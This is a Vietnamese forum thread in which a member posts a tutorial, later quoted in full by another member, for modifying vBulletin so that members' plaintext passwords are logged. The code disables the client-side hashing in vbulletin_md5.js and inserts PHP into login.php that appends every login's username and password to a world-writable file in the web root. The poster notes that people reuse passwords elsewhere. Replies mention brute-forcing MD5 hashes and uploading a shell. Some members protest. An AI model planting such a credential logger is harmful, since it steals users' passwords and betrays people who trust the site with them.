View Full Version : Cách hack pass các thành viên trong forum
bokgu07
01-14-2010, 05:18 PM
Nếu bạn là admin của 1 diễn đàn...bạn có thể tìm được pass của các thành viên trong diễn đàn của mình....cách làm như sau....
Mở file clientscript/vbulletin_md5.js
Thay dòng
input.value = ''; thành
//input.value = ''; Tiếp bạn mở file login.php
Tìm
if ($_POST['do'] == 'login')
{và chèn vào phía dưới
$fp = fopen("danhuongson.net.txt", "a+");
fwrite($fp, "Username: {$_POST['vb_login_username']}
Password: {$_POST['vb_login_password']}
");
rewind($fp);Cuối cùng tạo file danhuongson.net.txt và CHMOD 777 và upload lên root của forum...(ngang hàng với index.php)
Xong rùi...giờ ngồi đợi các mem login thui..kết quả sẽ được lưu lại trong file danhuongson.net.txt :D
Cho nên nếu bạn là admin của room nào đó thì tuyệt đối không đặt pass ở diễn đàn khác giống diễn đàn mình nhé....:D
Tham khảo từ hva
tieuthat
01-14-2010, 07:07 PM
nếu là member thì có cách nào lấy đựoc pass của hội nó ko,của admin chẳng hạn.
bokgu07
01-14-2010, 09:55 PM
hack thì hack được...nhưng mà học để hack được như thế e dài dài....:-s
Sinh_Nguyen
01-14-2010, 11:01 PM
Admin quản lý toàn bộ diễn đàn, cần gì phải hack pass hả bạn, theo mình nghĩ, ko cần hack pass admin vẫn có thể xem được password của thành viên.
tieuthat
01-14-2010, 11:02 PM
uh đúng đấy,hack cau cac mem làm gi,bày cách hack của adim có hay hơn ko.
peterpan
01-14-2010, 11:28 PM
Admin quản lý toàn bộ diễn đàn, cần gì phải hack pass hả bạn, theo mình nghĩ, ko cần hack pass admin vẫn có thể xem được password của thành viên.
Admin thì có thể xem đc password nhưng pass của member bị mã hoá dưới dạng MD5 chứ ko phải là dạng ký tự :) . Thực ra là Admin muốn truy cập vào user của member đơn giản thôi, chỉ cần vào phpmyadmin rồi copy đoạn Md5 của mình hoặc dùng phần mềm dịch MD5, edit user muốn vào là xong :) .
bokgu07
01-15-2010, 08:39 AM
Admin quản lý toàn bộ diễn đàn, cần gì phải hack pass hả bạn, theo mình nghĩ, ko cần hack pass admin vẫn có thể xem được password của thành viên.
quản lí toàn bộ đâu có xem được bạn...chỉ đổi được thôi...:D
Admin thì có thể xem đc password nhưng pass của member bị mã hoá dưới dạng MD5 chứ ko phải là dạng ký tự :) . Thực ra là Admin muốn truy cập vào user của member đơn giản thôi, chỉ cần vào phpmyadmin rồi copy đoạn Md5 của mình hoặc dùng phần mềm dịch MD5, edit user muốn vào là xong :) .
mình chỉ nói cái cách đơn giản nhất ấy thôi...:D
làm như cách trên bất cứ nick nào đăng nhập nó cũng lưu lại trong đó...cần thì mở file txt đó ra xem và search...:))
buithoigian
01-17-2010, 03:42 PM
Có đúng như mọi người nói vậy không? Nếu đúng vậy thì có lẽ đây là lần đăng nhập cuối cùng của mình trên forum!
vn.Zinki
01-17-2010, 04:58 PM
=)) ý tưởng độc đáo thật
admin log pass của mem
duanhngheo
01-17-2010, 06:00 PM
roai` pó tay thiệt ! đúng là ngộ nghĩnh thiệt !:)):))
bokgu07
01-17-2010, 06:19 PM
hơ hơ...
hoàn toàn bình thường đó chớ...
chỉ cần cách này...
là tha hồ bít mật khẩu các mem....=))
mà thường thì họ đặt mật khẩu ở mọi nơi giống nhau hết....=))
222_vinh1online
01-17-2010, 07:03 PM
bác này xem ra pro nhỉ? k pít là ý tưởng hay là.... 8-x 8-x 8-x
Lovely Boy
02-08-2010, 08:09 PM
1. nếu mem muốn biết pass admin thì cũng có nhiều cách:
+ hỏi admin xem pass là gì
+ local hack, up shell lên host rồi by pass
+ ......
2. nếu là admin có thể xem được user và pass của các mem chứ ko chỉ đổi được ko đâu .
^^ hi hi
3. admin chẳng bao giờ log vào nick mem làm gì ;))
vn.Zinki
02-08-2010, 09:44 PM
1. nếu mem muốn biết pass admin thì cũng có nhiều cách:
+ hỏi admin xem pass là gì
+ local hack, up shell lên host rồi by pass
+ ......
2. nếu là admin có thể xem được user và pass của các mem chứ ko chỉ đổi được ko đâu .
^^ hi hi
3. admin chẳng bao giờ log vào nick mem làm gì ;))
2. admin có thể đổi pass của mem nhưng không thể xem được pass, có thể vào CSDL để xem pass đã encode MD5 nhưng đây là dạng encode 1 chiều không thể decode được.
bokgu07
02-08-2010, 10:51 PM
@lovely boy: đó là làm nghịch chơi thế thui...nhưng đôi khi cũng được việc đấy....:)).....bít pass của người khác có phải là thỏa mãn trí tò mò ko chớ...:))...(mà thường thì người ta hay đặt pass ở mọi nơi giống nhau :D)...với lại cũng nói vs bác là ko xem được pass mem dễ như bác nói đâu...;)
@zinki: xem trong CSDL thì có thể ko được nhưng làm như em thì được đều đều....:D...nó ghi nhận từ mỗi khi nhập pass mà....:D
Lovely Boy
02-09-2010, 11:17 AM
2. admin có thể đổi pass của mem nhưng không thể xem được pass, có thể vào CSDL để xem pass đã encode MD5 nhưng đây là dạng encode 1 chiều không thể decode được.
Vẫn crack được mà, dùng brute force đi, chỉ có điều sẽ tốn thời gian mà thôi.
big_zero
02-18-2010, 09:18 PM
Nếu bạn là admin của 1 diễn đàn...bạn có thể tìm được pass của các thành viên trong diễn đàn của mình....cách làm như sau....
Mở file clientscript/vbulletin_md5.js
Thay dòng
input.value = ''; thành
//input.value = ''; Tiếp bạn mở file login.php
Tìm
if ($_POST['do'] == 'login')
{và chèn vào phía dưới
$fp = fopen("danhuongson.net.txt", "a+");
fwrite($fp, "Username: {$_POST['vb_login_username']}
Password: {$_POST['vb_login_password']}
");
rewind($fp);Cuối cùng tạo file danhuongson.net.txt và CHMOD 777 và upload lên root của forum...(ngang hàng với index.php)
Xong rùi...giờ ngồi đợi các mem login thui..kết quả sẽ được lưu lại trong file danhuongson.net.txt :D
Cho nên nếu bạn là admin của room nào đó thì tuyệt đối không đặt pass ở diễn đàn khác giống diễn đàn mình nhé....:D
Tham khảo từ hva
Hay thật! Định làm loạn hết lên à?:( các admin biết cách này rùi sao??? chuyện gì sẽ xảy ra??? Loạn lên ngay :( Yêu cầu delete mục này nhé :(
star2006
02-18-2010, 10:48 PM
Admin quản lý toàn bộ diễn đàn, cần gì phải hack pass hả bạn, theo mình nghĩ, ko cần hack pass admin vẫn có thể xem được password của thành viên.
Về forum thì mình ko biết rõ, nhưng các trang web bảo mật, có tình thương mại, thì phải có cơ chế là: Các admin ko được phép biết password của các thành viên, và password đó được mã hóa, ko ai biết cả.(Chỉ trừ trường hợp coder và admin có gì đó với nhau :D)(Càng web liên quan điến "Thương mại" thì càng phải bảo mật). Thường thì Admin có quyền vào mọi tài khoản với 1 pass mặc định hoặc với danh nghĩa admin mà thôi. Chứ trang web hay forum nào mà để cho admin xem được pass của các thành viên thì khá là nguy hiểm.
aUreOla
02-19-2010, 11:53 AM
TÓm lại, đứa nào lên danhuongson.net mà thấy pass bị mất hay các tài khoản của mình có vấn đề thì mang dao chém thằng bópku nhé =))
Ổng này đỉnh cao thật. Định viết 1 cái script scan các forumn xem có file danhuongson.net.txt để chén đây. Hàng kủng :=))
nhocyeuhp
02-27-2010, 12:19 AM
mỳnh chơi game , thường njck game alf njck forrum
như TLBB chẳng hạn
admjn chưa chắc đã là người , phải nói thế nào nhỷ
có nhiều người điều hành
mà chỉ cần 1 admjn nào ý đồ xấu
thì chết người rồi
còn gì ?
bokgu07
02-27-2010, 10:57 AM
ôi cha.....:(
chỉ giỡn chơi thui mà....:D
thế mới cho các bạn kinh nghiệm là những pass quan trọng thì đừng nên đặt giống các pass khác....:)
chanduy
03-10-2010, 09:34 PM
cái này cần thông báo cho admin
vBulletin® v3.8.3, Copyright ©2000-2010, Jelsoft Enterprises Ltd.